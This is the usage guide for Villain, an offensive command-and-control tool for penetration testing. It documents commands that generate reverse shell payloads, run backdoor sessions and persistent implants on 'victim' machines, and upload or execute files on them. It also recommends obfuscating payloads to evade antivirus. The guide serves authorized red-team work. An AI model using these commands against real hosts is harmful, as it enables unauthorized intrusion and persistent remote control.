Skip to content

Latest commit

 

History

History
130 lines (102 loc) · 8.17 KB

Usage_Guide.md

File metadata and controls

130 lines (102 loc) · 8.17 KB
Raw

Usage Guide

⚠️ Villain was explicitly developed and tested on kali linux.
⚠️ This guide is a work in progress currently describing key features. Check out Villain's introduction on youtube for more info.

[2022-11-30] John Hammond showcased the tool in this incredible video -> youtube.com/watch?v=pTUggbSCqA0
[2023-03-30] Latest release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ

Disclaimer: Using this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.

Table of contents

  1. News
  2. Generate Reverse Shell Commands
  3. Connect With Sibling Server
  4. Shell
  5. Upload Command
  6. Conptyshell
  7. Exec
  8. Flee
  9. Purge
  10. Chat with Sibling Servers
  11. Session Defender

News

2023-08-07 Update log

  • A new update mechanism was introduced that compares file signatures from the main branch of the project's repo against local installation file signatures and proceeds to upgrade. The option --skip-update was also added.

2023-08-03 Update log

  • HoaxShell implants are now reusable as long as they were generated by the Villain instance you are trying to connect back to from the victim (Legit session data is saved on disk and is loaded into memory every time you start Villain on your machine). Villain will also re-establish a session if it receives beacons from it (e.g., because the payload is still running on a victim from a past session).
  • You can use the new prompt command flee to exit Villain without terminating active sessions. That way, next time you start it, if there are alive beacons from victims, sessions will be re-established.
  • The --insecure option was added which will allow sibling servers to connect to your instance without approval.
  • Added a filter for random socket connections to Villain's TCP multi-listener that should prevent establishing junk sessions.
  • Fixed an issue regarding the sessions table that could break because of junk TCP sessions.
  • Added the purge prompt command to delete all session related metadata stored on disk.

2023-03-31 Update log

  • The Payload Generator class was redesigned to work by dynamically engaging payload templates with a standard structure. This makes payload generation much easier and allows users to edit the default payload templates or add their own, according to their needs & tactics. As you'll notice, most of the default templates I've added for both Windows and Linux are designed to start as new processes.
  • The stability and general functionality of the pseudo-shell prompt ("shell" command) has been significantly improved.
  • The "upload" and "conptyshell" commands were added.
  • A new chat feature was added (you can broadcast messages to all siblings by starting a command with "#").
  • The "exec" command is also improved but still kind of unstable. Someday it's gonna be doing wonders. Have a little faith.

Generate Reverse Shell Commands

Use the generate prompt command to generate payloads for Windows / Linux machines. In the latest Villain release, this function was redesigned to use payload templates (files). In Core/payload_templates/<OS>/<HANDLER>/ you can find these templates, edit them, make your own, etc. Ultimately, you should replace the predefined Windows reverse shell commands with obfuscated versions. That way you can create a personalized instance of Villain and deal with AV evasion in a more productive and efficient way. Here's how 📽️ -> youtube.com/watch?v=grSBdZdUya0

Main logic:

generate payload=<OS_TYPE/HANDLER/PAYLOAD_TEMPLATE> lhost=<IP or INTERFACE> [ obfuscate encode ]

Usage examples:

generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0 encode
generate payload=linux/hoaxshell/sh_curl lhost=eth0
  • The ENCODE and OBFUSCATE keywords are enabled for certain templates and can be used during payload generation.
  • For info on a particular template, use "generate" with PAYLOAD being the only provided argument.
  • To catch HoaxShell https-based reverse shells you need to start Villain with SSL.
  • Ultimately, one should edit the templates and add obfuscated versions of the commands for AV evasion.

⚡TCP socket based shells (netcat) are more stable and reliable than HoaxShell. ⚠️HoaxShell payloads are not reusable (will work only once). I will probably change that in the future.

Use the prompt commands backdoors and sessions to list info about your active shell sessions.

Connect With Sibling Server

Use the connect prompt command to connect and share your shell sessions with another machine running Villain.

connect <IP> <TEAM SERVER PORT>

By default, the Core server port is 65001 (you can change that with -p when starting Villain).

The shell Command

Use the shell prompt command to start an interactive pseudo-shell for a shell session. The effectiveness of the pseudo shell is going to vary depending on the quality and stability of the shell session. Again, you should prefer TCP socket based shells as they will always be more stable than HoaxShell.

shell <SESSION ID or ALIAS>

Press Ctrl + C or type exit to return to the main Villain prompt.

Upload

Use the upload prompt command to transfer a file from your system to a backdoored machine. The file will be http requested automatically from the Http File Smuggler (running by default on port 8888). The feature works regardless if the session is owned by you or a sibling server. You can run the command from Villain's main prompt as well as the pseudo shell terminal.

From the main prompt:

upload <LOCAL_FILE_PATH> <REMOTE_FILE_PATH> <SESSION ID or ALIAS>

From an active pseudo shell prompt:

upload <LOCAL_FILE_PATH> <REMOTE_FILE_PATH>

Conptyshell

Use the conptyshell prompt command to automatically slap Invoke-ConPtyShell.ps1 against a shell session. A new terminal window with netcat listening will pop up (you need to have gnome-terminal installed) and the script will be executed on the target as a new process, meaning you get a fully interactive shell AND you get to keep your backdoor. Currently works only for powershell.exe backdoors. Because I love Invoke-ConPtyShell.

Usage:

conptyshell <IP or INTERFACE> <PORT> <SESSION ID or ALIAS>

Exec

Use the exec prompt command to execute a quoted command or script from your file system against a session. Files are executed by being http requested from the Http File Smuggler. Be carefull! The script you execute should much the shell session type (e.g., a PowerShell script script should be executed against a powershell.exe session, etc).

Usage:

exec </path/to/local/file> <SESSION ID or ALIAS>
exec 'net user;Get-Date' <SESSION ID or ALIAS>

Flee

Use the flee prompt command to exit Villain without terminating any active sessions. If you start Villain again later and there are still victim machines sending HoaxShell beacons, the sessions will be re-established automatically.

Purge

Villain automatically stores information regarding generated implants and loads them in memory every time it starts. This way, HoaxShell generated implants become reusable and it is possible to re-establish older sessions, assuming the payload is still running on the victim(s). Use the purge prompt command to delete all session related metadata. It does not affect any active sessions you may have.

Chat with Sibling Servers

Commands starting with "#" are interpreted as messages and will be broadcasted to all connected Sibling Servers.

Session Defender

Villain has a function that inspects user issued shell commands for input that may cause a backdoor shell session to hang (e.g., unclosed single/double quotes or backticks, commands that may start a new interactive session within the current shell and more). Use the cmdinspector command to turn that feature on/off.

Usage:

cmdinspector <ON/OFF>